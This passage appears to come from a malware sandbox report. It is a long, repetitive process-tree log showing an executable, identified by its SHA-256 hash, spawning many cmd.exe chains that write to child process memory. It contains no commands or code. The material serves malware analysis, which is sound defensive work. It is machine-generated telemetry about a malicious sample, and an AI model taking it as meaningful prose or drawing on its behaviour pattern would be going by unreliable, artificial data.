1968 cmd.exe 200 PID 1968 wrote to memory of 4248 1968 cmd.exe 200 PID 1968 wrote to memory of 4248 1968 cmd.exe 200 PID 1968 wrote to memory of 4200 1968 cmd.exe 201 PID 1968 wrote to memory of 4200 1968 cmd.exe 201 PID 1968 wrote to memory of 4200 1968 cmd.exe 201 PID 4200 wrote to memory of 4504 4200 cmd.exe 202 PID 4200 wrote to memory of 4504 4200 cmd.exe 202 PID 4200 wrote to memory of 4504 4200 cmd.exe 202 PID 1968 wrote to memory of 2180 1968 cmd.exe 203 PID 1968 wrote to memory of 2180 1968 cmd.exe 203 PID 1968 wrote to memory of 2180 1968 cmd.exe 203 PID 3832 wrote to memory of 4712 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 205 PID 3832 wrote to memory of 4712 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 205 PID 3832 wrote to memory of 4712 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 205 PID 4712 wrote to memory of 4440 4712 cmd.exe 207 PID 4712 wrote to memory of 4440 4712 cmd.exe 207 PID 4712 wrote to memory of 4440 4712 cmd.exe 207 PID 4712 wrote to memory of 4436 4712 cmd.exe 208 PID 4712 wrote to memory of 4436 4712 cmd.exe 208 PID 4712 wrote to memory of 4436 4712 cmd.exe 208 PID 4712 wrote to memory of 4932 4712 cmd.exe 209 PID 4712 wrote to memory of 4932 4712 cmd.exe 209 PID 4712 wrote to memory of 4932 4712 cmd.exe 209 PID 4932 wrote to memory of 1044 4932 cmd.exe 210 PID 4932 wrote to memory of 1044 4932 cmd.exe 210 PID 4932 wrote to memory of 1044 4932 cmd.exe 210 PID 4712 wrote to memory of 4600 4712 cmd.exe 211 PID 4712 wrote to memory of 4600 4712 cmd.exe 211 PID 4712 wrote to memory of 4600 4712 cmd.exe 211 PID 3832 wrote to memory of 4616 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 212 PID 3832 wrote to memory of 4616 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 212 PID 3832 wrote to memory of 4616 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 212 PID 3368 wrote to memory of 2304 3368 wscript.exe 214 PID 3368 wrote to memory of 2304 3368 wscript.exe 214 PID 3368 wrote to memory of 2304 3368 wscript.exe 214 PID 4616 wrote to memory of 4296 4616 cmd.exe 216 PID 4616 wrote to memory of 4296 4616 cmd.exe 216 PID 4616 wrote to memory of 4296 4616 cmd.exe 216 PID 2304 wrote to memory of 4764 2304 cmd.exe 217 PID 2304 wrote to memory of 4764 2304 cmd.exe 217 PID 2304 wrote to memory of 4764 2304 cmd.exe 217 PID 4616 wrote to memory of 4876 4616 cmd.exe 218 PID 4616 wrote to memory of 4876 4616 cmd.exe 218 PID 4616 wrote to memory of 4876 4616 cmd.exe 218 PID 4616 wrote to memory of 4276 4616 cmd.exe 219 PID 4616 wrote to memory of 4276 4616 cmd.exe 219 PID 4616 wrote to memory of 4276 4616 cmd.exe 219 PID 4276 wrote to memory of 4492 4276 cmd.exe 220 PID 4276 wrote to memory of 4492 4276 cmd.exe 220 PID 4276 wrote to memory of 4492 4276 cmd.exe 220 PID 4616 wrote to memory of 4336 4616 cmd.exe 222 PID 4616 wrote to memory of 4336 4616 cmd.exe 222 PID 4616 wrote to memory of 4336 4616 cmd.exe 222 PID 3832 wrote to memory of 4324 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 223 PID 3832 wrote to memory of 4324 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 223 PID 3832 wrote to memory of 4324 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 223 PID 4324 wrote to memory of 4552 4324 cmd.exe 225 PID 4324 wrote to memory of 4552 4324 cmd.exe 225 PID 4324 wrote to memory of 4552 4324 cmd.exe 225 PID 4324 wrote to memory of 4428 4324 cmd.exe 226 PID 4324 wrote to memory of 4428 4324 cmd.exe 226 PID 4324 wrote to memory of 4428 4324 cmd.exe 226 PID 4324 wrote to memory of 4592 4324 cmd.exe 227 PID 4324 wrote to memory of 4592 4324 cmd.exe 227 PID 4324 wrote to memory of 4592 4324 cmd.exe 227 PID 4592 wrote to memory of 4960 4592 cmd.exe 228 PID 4592 wrote to memory of 4960 4592 cmd.exe 228 PID 4592 wrote to memory of 4960 4592 cmd.exe 228 PID 4324 wrote to memory of 4656 4324 cmd.exe 229 PID 4324 wrote to memory of 4656 4324 cmd.exe 229 PID 4324 wrote to memory of 4656 4324 cmd.exe 229 PID 3832 wrote to memory of 4612 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 230 PID 3832 wrote to memory of 4612 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 230 PID 3832 wrote to memory of 4612 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 230 PID 4612 wrote to memory of 4720 4612 cmd.exe 232 PID 4612 wrote to memory of 4720 4612 cmd.exe 232 PID 4612 wrote to memory of 4720 4612 cmd.exe 232 PID 4612 wrote to memory of 4760 4612 cmd.exe 233 PID 4612 wrote to memory of 4760 4612 cmd.exe 233 PID 4612 wrote to memory of 4760 4612 cmd.exe 233 PID 4612 wrote to memory of 4796 4612 cmd.exe 234 PID 4612 wrote to memory of 4796 4612 cmd.exe 234 PID 4612 wrote to memory of 4796 4612 cmd.exe 234 PID 4796 wrote to memory of 4940 4796 cmd.exe 235 PID 4796 wrote to memory of 4940 4796 cmd.exe 235 PID 4796 wrote to memory of 4940 4796 cmd.exe 235 PID 4612 wrote to memory of 4560 4612 cmd.exe 236 PID 4612 wrote to memory of 4560 4612 cmd.exe 236 PID 4612 wrote to memory of 4560 4612 cmd.exe 236 PID 3832 wrote to memory of 4580 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 237 PID 3832 wrote to memory of 4580 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 237 PID 3832 wrote to memory of 4580 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 237 PID 4580 wrote to memory of 4284 4580 cmd.exe 239 PID 4580 wrote to memory of 4284 4580 cmd.exe 239 PID 4580 wrote to memory of 4284 4580 cmd.exe 239 PID 4580 wrote to memory of 3188 4580 cmd.exe 241 PID 4580 wrote to memory of 3188 4580 cmd.exe 241 PID 4580 wrote to memory of 3188 4580 cmd.exe 241 PID 4580 wrote to memory of 4936 4580 cmd.exe 242 PID 4580 wrote to memory of 4936 4580 cmd.exe 242 PID 4580 wrote to memory of 4936 4580 cmd.exe 242 PID 4936 wrote to memory of 4920 4936 cmd.exe 243 PID 4936 wrote to memory of 4920 4936 cmd.exe 243 PID 4936 wrote to memory of 4920 4936 cmd.exe 243 PID 4580 wrote to memory of 4868 4580 cmd.exe 244 PID 4580 wrote to memory of 4868 4580 cmd.exe 244 PID 4580 wrote to memory of 4868 4580 cmd.exe 244 PID 3832 wrote to memory of 4548 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 245 PID 3832 wrote to memory of 4548 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 245 PID 3832 wrote to memory of 4548 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 245 PID 4548 wrote to memory of 4660 4548 cmd.exe 247 PID 4548 wrote to memory of 4660 4548 cmd.exe 247 PID 4548 wrote to memory of 4660 4548 cmd.exe 247 PID 4548 wrote to memory of 4676 4548 cmd.exe 248 PID 4548 wrote to memory of 4676 4548 cmd.exe 248 PID 4548 wrote to memory of 4676 4548 cmd.exe 248 PID 4548 wrote to memory of 4432 4548 cmd.exe 249 PID 4548 wrote to memory of 4432 4548 cmd.exe 249 PID 4548 wrote to memory of 4432 4548 cmd.exe 249 PID 4432 wrote to memory of 5044 4432 cmd.exe 250 PID 4432 wrote to memory of 5044 4432 cmd.exe 250 PID 4432 wrote to memory of 5044 4432 cmd.exe 250 PID 4548 wrote to memory of 4788 4548 cmd.exe 251 PID 4548 wrote to memory of 4788 4548 cmd.exe 251 PID 4548 wrote to memory of 4788 4548 cmd.exe 251 PID 3832 wrote to memory of 5100 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 252 PID 3832 wrote to memory of 5100 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 252 PID 3832 wrote to memory of 5100 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 252 PID 5100 wrote to memory of 4768 5100 cmd.exe 254 PID 5100 wrote to memory of 4768 5100 cmd.exe 254 PID 5100 wrote to memory of 4768 5100 cmd.exe 254 PID 5100 wrote to memory of 4400 5100 cmd.exe 256 PID 5100 wrote to memory of 4400 5100 cmd.exe 256 PID 5100 wrote to memory of 4400 5100 cmd.exe 256 PID 5100 wrote to memory of 1236 5100 cmd.exe 257 PID 5100 wrote to memory of 1236 5100 cmd.exe 257 PID 5100 wrote to memory of 1236 5100 cmd.exe 257 PID 1236 wrote to memory of 4340 1236 cmd.exe 258 PID 1236 wrote to memory of 4340 1236 cmd.exe 258 PID 1236 wrote to memory of 4340 1236 cmd.exe 258 PID 5100 wrote to memory of 4156 5100 cmd.exe 259 PID 5100 wrote to memory of 4156 5100 cmd.exe 259 PID 5100 wrote to memory of 4156 5100 cmd.exe 259 PID 3832 wrote to memory of 4824 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 260 PID 3832 wrote to memory of 4824 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 260 PID 3832 wrote to memory of 4824 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 260 PID 4824 wrote to memory of 5092 4824 cmd.exe 262 PID 4824 wrote to memory of 5092 4824 cmd.exe 262 PID 4824 wrote to memory of 5092 4824 cmd.exe 262 PID 4824 wrote to memory of 3852 4824 cmd.exe 263 PID 4824 wrote to memory of 3852 4824 cmd.exe 263 PID 4824 wrote to memory of 3852 4824 cmd.exe 263 PID 4824 wrote to memory of 4840 4824 cmd.exe 264 PID 4824 wrote to memory of 4840 4824 cmd.exe 264 PID 4824 wrote to memory of 4840 4824 cmd.exe 264 PID 4840 wrote to memory of 5104 4840 cmd.exe 265 PID 4840 wrote to memory of 5104 4840 cmd.exe 265 PID 4840 wrote to memory of 5104 4840 cmd.exe 265 PID 4824 wrote to memory of 4784 4824 cmd.exe 266 PID 4824 wrote to memory of 4784 4824 cmd.exe 266 PID 4824 wrote to memory of 4784 4824 cmd.exe 266 PID 3832 wrote to memory of 5052 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 267 PID 3832 wrote to memory of 5052 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 267 PID 3832 wrote to memory of 5052 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 267 PID 5052 wrote to memory of 4212 5052 cmd.exe 269 PID 5052 wrote to memory of 4212 5052 cmd.exe 269 PID 5052 wrote to memory of 4212 5052 cmd.exe 269 PID 5052 wrote to memory of 4668 5052 cmd.exe 270 PID 5052 wrote to memory of 4668 5052 cmd.exe 270 PID 5052 wrote to memory of 4668 5052 cmd.exe 270 PID 5052 wrote to memory of 4928 5052 cmd.exe 271 PID 5052 wrote to memory of 4928 5052 cmd.exe 271 PID 5052 wrote to memory of 4928 5052 cmd.exe 271 PID 4928 wrote to memory of 4392 4928 cmd.exe 272 PID 4928 wrote to memory of 4392 4928 cmd.exe 272 PID 4928 wrote to memory of 4392 4928 cmd.exe 272 PID 5052 wrote to memory of 4736 5052 cmd.exe 273 PID 5052 wrote to memory of 4736 5052 cmd.exe 273 PID 5052 wrote to memory of 4736 5052 cmd.exe 273 PID 3832 wrote to memory of 4628 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 274 PID 3832 wrote to memory of 4628 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 274 PID 3832 wrote to memory of 4628 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 274 PID 4628 wrote to memory of 4792 4628 cmd.exe 276 PID 4628 wrote to memory of 4792 4628 cmd.exe 276 PID 4628 wrote to memory of 4792 4628 cmd.exe 276 PID 4628 wrote to memory of 4728 4628 cmd.exe 277 PID 4628 wrote to memory of 4728 4628 cmd.exe 277 PID 4628 wrote to memory of 4728 4628 cmd.exe 277 PID 4628 wrote to memory of 4800 4628 cmd.exe 278 PID 4628 wrote to memory of 4800 4628 cmd.exe 278 PID 4628 wrote to memory of 4800 4628 cmd.exe 278 PID 4800 wrote to memory of 4288 4800 cmd.exe 279 PID 4800 wrote to memory of 4288 4800 cmd.exe 279 PID 4800 wrote to memory of 4288 4800 cmd.exe 279 PID 3800 wrote to memory of 4344 3800 cmd.exe 280 PID 3800 wrote to memory of 4344 3800 cmd.exe 280 PID 4628 wrote to memory of 2364 4628 cmd.exe 281 PID 4628 wrote to memory of 2364 4628 cmd.exe 281 PID 4628 wrote to memory of 2364 4628 cmd.exe 281 PID 3832 wrote to memory of 4124 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 282 PID 3832 wrote to memory of 4124 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 282 PID 3832 wrote to memory of 4124 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 282 PID 4124 wrote to memory of 4716 4124 cmd.exe 284 PID 4124 wrote to memory of 4716 4124 cmd.exe 284 PID 4124 wrote to memory of 4716 4124 cmd.exe 284 PID 4124 wrote to memory of 4692 4124 cmd.exe 285 PID 4124 wrote to memory of 4692 4124 cmd.exe 285 PID 4124 wrote to memory of 4692 4124 cmd.exe 285 PID 4124 wrote to memory of 1868 4124 cmd.exe 286 PID 4124 wrote to memory of 1868 4124 cmd.exe 286 PID 4124 wrote to memory of 1868 4124 cmd.exe 286 PID 1868 wrote to memory of 4564 1868 cmd.exe 287 PID 1868 wrote to memory of 4564 1868 cmd.exe 287 PID 1868 wrote to memory of 4564 1868 cmd.exe 287 PID 4124 wrote to memory of 4584 4124 cmd.exe 288 PID 4124 wrote to memory of 4584 4124 cmd.exe 288 PID 4124 wrote to memory of 4584 4124 cmd.exe 288 PID 3832 wrote to memory of 4472 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 289 PID 3832 wrote to memory of 4472 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 289 PID 3832 wrote to memory of 4472 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 289 PID 4472 wrote to memory of 4388 4472 cmd.exe 291 PID 4472 wrote to memory of 4388 4472 cmd.exe 291 PID 4472 wrote to memory of 4388 4472 cmd.exe 291 PID 4472 wrote to memory of 4568 4472 cmd.exe 292 PID 4472 wrote to memory of 4568 4472 cmd.exe 292 PID 4472 wrote to memory of 4568 4472 cmd.exe 292 PID 4472 wrote to memory of 4252 4472 cmd.exe 293 PID 4472 wrote to memory of 4252 4472 cmd.exe 293 PID 4472 wrote to memory of 4252 4472 cmd.exe 293 PID 4252 wrote to memory of 4228 4252 cmd.exe 294 PID 4252 wrote to memory of 4228 4252 cmd.exe 294 PID 4252 wrote to memory of 4228 4252 cmd.exe 294 PID 4472 wrote to memory of 4820 4472 cmd.exe 295 PID 4472 wrote to memory of 4820 4472 cmd.exe 295 PID 4472 wrote to memory of 4820 4472 cmd.exe 295 PID 3832 wrote to memory of 4240 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 296 PID 3832 wrote to memory of 4240 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 296 PID 3832 wrote to memory of 4240 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 296 PID 4240 wrote to memory of 5056 4240 cmd.exe 298 PID 4240 wrote to memory of 5056 4240 cmd.exe 298 PID 4240 wrote to memory of 5056 4240 cmd.exe 298 PID 4240 wrote to memory of 4752 4240 cmd.exe 299 PID 4240 wrote to memory of 4752 4240 cmd.exe 299 PID 4240 wrote to memory of 4752 4240 cmd.exe 299 PID 4240 wrote to memory of 4256 4240 cmd.exe 300 PID 4240 wrote to memory of 4256 4240 cmd.exe 300 PID 4240 wrote to memory of 4256 4240 cmd.exe 300 PID 4256 wrote to memory of 4636 4256 cmd.exe 301 PID 4256 wrote to memory of 4636 4256 cmd.exe 301 PID 4256 wrote to memory of 4636 4256 cmd.exe 301 PID 4240 wrote to memory of 4524 4240 cmd.exe 302 PID 4240 wrote to memory of 4524 4240 cmd.exe 302 PID 4240 wrote to memory of 4524 4240 cmd.exe 302 PID 3832 wrote to memory of 4544 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 303 PID 3832 wrote to memory of 4544 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 303 PID 3832 wrote to memory of 4544 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 303 PID 4544 wrote to memory of 4268 4544 cmd.exe 305 PID 4544 wrote to memory of 4268 4544 cmd.exe 305 PID 4544 wrote to memory of 4268 4544 cmd.exe 305 PID 4544 wrote to memory of 3728 4544 cmd.exe 306 PID 4544 wrote to memory of 3728 4544 cmd.exe 306 PID 4544 wrote to memory of 3728 4544 cmd.exe 306 PID 4544 wrote to memory of 4740 4544 cmd.exe 307 PID 4544 wrote to memory of 4740 4544 cmd.exe 307 PID 4544 wrote to memory of 4740 4544 cmd.exe 307 PID 4740 wrote to memory of 4308 4740 cmd.exe 308 PID 4740 wrote to memory of 4308 4740 cmd.exe 308 PID 4740 wrote to memory of 4308 4740 cmd.exe 308 PID 4544 wrote to memory of 4128 4544 cmd.exe 309 PID 4544 wrote to memory of 4128 4544 cmd.exe 309 PID 4544 wrote to memory of 4128 4544 cmd.exe 309 PID 3832 wrote to memory of 4480 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 310 PID 3832 wrote to memory of 4480 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 310 PID 3832 wrote to memory of 4480 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 310 PID 4480 wrote to memory of 4236 4480 cmd.exe 312 PID 4480 wrote to memory of 4236 4480 cmd.exe 312 PID 4480 wrote to memory of 4236 4480 cmd.exe 312 PID 4480 wrote to memory of 2368 4480 cmd.exe 313 PID 4480 wrote to memory of 2368 4480 cmd.exe 313 PID 4480 wrote to memory of 2368 4480 cmd.exe 313 PID 4480 wrote to memory of 4812 4480 cmd.exe 314 PID 4480 wrote to memory of 4812 4480 cmd.exe 314 PID 4480 wrote to memory of 4812 4480 cmd.exe 314 PID 4812 wrote to memory of 4924 4812 cmd.exe 315 PID 4812 wrote to memory of 4924 4812 cmd.exe 315 PID 4812 wrote to memory of 4924 4812 cmd.exe 315 PID 4480 wrote to memory of 4260 4480 cmd.exe 316 PID 4480 wrote to memory of 4260 4480 cmd.exe 316 PID 4480 wrote to memory of 4260 4480 cmd.exe 316 PID 3832 wrote to memory of 3372 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 317 PID 3832 wrote to memory of 3372 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 317 PID 3832 wrote to memory of 3372 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 317 PID 3372 wrote to memory of 1332 3372 cmd.exe 319 PID 3372 wrote to memory of 1332 3372 cmd.exe 319 PID 3372 wrote to memory of 1332 3372 cmd.exe 319 PID 3372 wrote to memory of 4696 3372 cmd.exe 320 PID 3372 wrote to memory of 4696 3372 cmd.exe 320 PID 3372 wrote to memory of 4696 3372 cmd.exe 320 PID 3372 wrote to memory of 4264 3372 cmd.exe 321 PID 3372 wrote to memory of 4264 3372 cmd.exe 321 PID 3372 wrote to memory of 4264 3372 cmd.exe 321 PID 4264 wrote to memory of 4900 4264 cmd.exe 322 PID 4264 wrote to memory of 4900 4264 cmd.exe 322 PID 4264 wrote to memory of 4900 4264 cmd.exe 322 PID 3372 wrote to memory of 4232 3372 cmd.exe 323 PID 3372 wrote to memory of 4232 3372 cmd.exe 323 PID 3372 wrote to memory of 4232 3372 cmd.exe 323 PID 3832 wrote to memory of 4144 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 324 PID 3832 wrote to memory of 4144 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 324 PID 3832 wrote to memory of 4144 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 324 PID 4144 wrote to memory of 4852 4144 cmd.exe 326 PID 4144 wrote to memory of 4852 4144 cmd.exe 326 PID 4144 wrote to memory of 4852 4144 cmd.exe 326 PID 4144 wrote to memory of 4452 4144 cmd.exe 327 PID 4144 wrote to memory of 4452 4144 cmd.exe 327 PID 4144 wrote to memory of 4452 4144 cmd.exe 327 PID 4144 wrote to memory of 2604 4144 cmd.exe 328 PID 4144 wrote to memory of 2604 4144 cmd.exe 328 PID 4144 wrote to memory of 2604 4144 cmd.exe 328 PID 2604 wrote to memory of 1760 2604 cmd.exe 329 PID 2604 wrote to memory of 1760 2604 cmd.exe 329 PID 2604 wrote to memory of 1760 2604 cmd.exe 329 PID 4144 wrote to memory of 4816 4144 cmd.exe 330 PID 4144 wrote to memory of 4816 4144 cmd.exe 330 PID 4144 wrote to memory of 4816 4144 cmd.exe 330 PID 3832 wrote to memory of 4460 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 331 PID 3832 wrote to memory of 4460 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 331 PID 3832 wrote to memory of 4460 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 331 PID 4460 wrote to memory of 2172 4460 cmd.exe 333 PID 4460 wrote to memory of 2172 4460 cmd.exe 333 PID 4460 wrote to memory of 2172 4460 cmd.exe 333 PID 4460 wrote to memory of 5060 4460 cmd.exe 334 PID 4460 wrote to memory of 5060 4460 cmd.exe 334 PID 4460 wrote to memory of 5060 4460 cmd.exe 334 PID 4460 wrote to memory of 4860 4460 cmd.exe 335 PID 4460 wrote to memory of 4860 4460 cmd.exe 335 PID 4460 wrote to memory of 4860 4460 cmd.exe 335 PID 4860 wrote to memory of 4780 4860 cmd.exe 336 PID 4860 wrote to memory of 4780 4860 cmd.exe 336 PID 4860 wrote to memory of 4780 4860 cmd.exe 336 PID 4460 wrote to memory of 4704 4460 cmd.exe 337 PID 4460 wrote to memory of 4704 4460 cmd.exe 337 PID 4460 wrote to memory of 4704 4460 cmd.exe 337 PID 3832 wrote to memory of 4468 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 338 PID 3832 wrote to memory of 4468 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 338 PID 3832 wrote to memory of 4468 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 338 PID 4468 wrote to memory of 4180 4468 cmd.exe 340 PID 4468 wrote to memory of 4180 4468 cmd.exe 340 PID 4468 wrote to memory of 4180 4468 cmd.exe 340 PID 4468 wrote to memory of 4620 4468 cmd.exe 341 PID 4468 wrote to memory of 4620 4468 cmd.exe 341 PID 4468 wrote to memory of 4620 4468 cmd.exe 341 PID 4468 wrote to memory of 5108 4468 cmd.exe 342 PID 4468 wrote to memory of 5108 4468 cmd.exe 342 PID 4468 wrote to memory of 5108 4468 cmd.exe 342 PID 5108 wrote to memory of 4632 5108 cmd.exe 343 PID 5108 wrote to memory of 4632 5108 cmd.exe 343 PID 5108 wrote to memory of 4632 5108 cmd.exe 343 PID 4468 wrote to memory of 5136 4468 cmd.exe 344 PID 4468 wrote to memory of 5136 4468 cmd.exe 344 PID 4468 wrote to memory of 5136 4468 cmd.exe 344 PID 3832 wrote to memory of 5160 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 345 PID 3832 wrote to memory of 5160 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 345 PID 3832 wrote to memory of 5160 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 345 PID 5160 wrote to memory of 5208 5160 cmd.exe 347 PID 5160 wrote to memory of 5208 5160 cmd.exe 347 PID 5160 wrote to memory of 5208 5160 cmd.exe 347 PID 5160 wrote to memory of 5228 5160 cmd.exe 348 PID 5160 wrote to memory of 5228 5160 cmd.exe 348 PID 5160 wrote to memory of 5228 5160 cmd.exe 348 PID 5160 wrote to memory of 5248 5160 cmd.exe 349 PID 5160 wrote to memory of 5248 5160 cmd.exe 349 PID 5160 wrote to memory of 5248 5160 cmd.exe 349 PID 5248 wrote to memory of 5264 5248 cmd.exe 350 PID 5248 wrote to memory of 5264 5248 cmd.exe 350 PID 5248 wrote to memory of 5264 5248 cmd.exe 350 PID 5160 wrote to memory of 5284 5160 cmd.exe 351 PID 5160 wrote to memory of 5284 5160 cmd.exe 351 PID 5160 wrote to memory of 5284 5160 cmd.exe 351 PID 3832 wrote to memory of 5308 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 352 PID 3832 wrote to memory of 5308 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 352 PID 3832 wrote to memory of 5308 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 352 PID 5308 wrote to memory of 5356 5308 cmd.exe 354 PID 5308 wrote to memory of 5356 5308 cmd.exe 354 PID 5308 wrote to memory of 5356 5308 cmd.exe 354 PID 5308 wrote to memory of 5376 5308 cmd.exe 355 PID 5308 wrote to memory of 5376 5308 cmd.exe 355 PID 5308 wrote to memory of 5376 5308 cmd.exe 355 PID 5308 wrote to memory of 5396 5308 cmd.exe 356 PID 5308 wrote to memory of 5396 5308 cmd.exe 356 PID 5308 wrote to memory of 5396 5308 cmd.exe 356 PID 5396 wrote to memory of 5412 5396 cmd.exe 357 PID 5396 wrote to memory of 5412 5396 cmd.exe 357 PID 5396 wrote to memory of 5412 5396 cmd.exe 357 PID 5308 wrote to memory of 5436 5308 cmd.exe 358 PID 5308 wrote to memory of 5436 5308 cmd.exe 358 PID 5308 wrote to memory of 5436 5308 cmd.exe 358 PID 3832 wrote to memory of 5468 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 359 PID 3832 wrote to memory of 5468 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 359 PID 3832 wrote to memory of 5468 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 359 PID 5468 wrote to memory of 5516 5468 cmd.exe 361 PID 5468 wrote to memory of 5516 5468 cmd.exe 361 PID 5468 wrote to memory of 5516 5468 cmd.exe 361 PID 5468 wrote to memory of 5536 5468 cmd.exe 362 PID 5468 wrote to memory of 5536 5468 cmd.exe 362 PID 5468 wrote to memory of 5536 5468 cmd.exe 362 PID 5468 wrote to memory of 5556 5468 cmd.exe 363 PID 5468 wrote to memory of 5556 5468 cmd.exe 363 PID 5468 wrote to memory of 5556 5468 cmd.exe 363 PID 5556 wrote to memory of 5572 5556 cmd.exe 364 PID 5556 wrote to memory of 5572 5556 cmd.exe 364 PID 5556 wrote to memory of 5572 5556 cmd.exe 364 PID 5468 wrote to memory of 5592 5468 cmd.exe 365 PID 5468 wrote to memory of 5592 5468 cmd.exe 365 PID 5468 wrote to memory of 5592 5468 cmd.exe 365 PID 3832 wrote to memory of 5616 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 366 PID 3832 wrote to memory of 5616 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 366 PID 3832 wrote to memory of 5616 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 366 PID 5616 wrote to memory of 5664 5616 cmd.exe 368 PID 5616 wrote to memory of 5664 5616 cmd.exe 368 PID 5616 wrote to memory of 5664 5616 cmd.exe 368 PID 5616 wrote to memory of 5684 5616 cmd.exe 369 PID 5616 wrote to memory of 5684 5616 cmd.exe 369 PID 5616 wrote to memory of 5684 5616 cmd.exe 369 PID 5616 wrote to memory of 5704 5616 cmd.exe 370 PID 5616 wrote to memory of 5704 5616 cmd.exe 370 PID 5616 wrote to memory of 5704 5616 cmd.exe 370 PID 5704 wrote to memory of 5720 5704 cmd.exe 371 PID 5704 wrote to memory of 5720 5704 cmd.exe 371 PID 5704 wrote to memory of 5720 5704 cmd.exe 371 PID 5616 wrote to memory of 5740 5616 cmd.exe 372 PID 5616 wrote to memory of 5740 5616 cmd.exe 372 PID 5616 wrote to memory of 5740 5616 cmd.exe 372 PID 3832 wrote to memory of 5764 3832 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 373 PID 3832 wrote to memory of 5764 3832 